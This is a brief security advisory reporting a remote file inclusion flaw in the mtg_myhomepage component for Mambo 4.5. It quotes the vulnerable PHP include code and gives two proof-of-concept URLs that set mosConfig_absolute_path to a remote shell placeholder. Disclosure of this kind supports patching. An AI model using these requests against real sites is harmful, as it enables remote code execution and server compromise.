The mtg_myhomepage module for Mambo version 4.5 suffers from a remote file inclusion vulnerability.
7c3b026bd281db4999c3f0608281bd8bc1a30e6deb3570c748378bd371afc17a
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #
# < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: mtg_myhomepage Component For Mambo 4.5
#Vendor : http://www.kamgaing.com/
#Attack method: Remote File Inclusion
#Source:
if (file_exists
($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/'.$mosConfig_lang.'.php'))
include_once
($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/'.$mosConfig_lang.'.php');
else
include_once
($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/english.php');
if ($mosConfig_mbf_content)
$iso_client_lang = MambelFish::discoverLanguage( $database );
else
$iso_client_lang = _LMTG_PRIMARY_LANG;
************************************************************************************
#Proof of Concept:
#install.lmtg_homepage.php?mosConfig_absolute_path= SHELL
#mtg_homepage.php?mosConfig_absolute_path= SHELL
#
#----------------------------------------------------------
#
#
#Contact : Outlaw@aria-security.net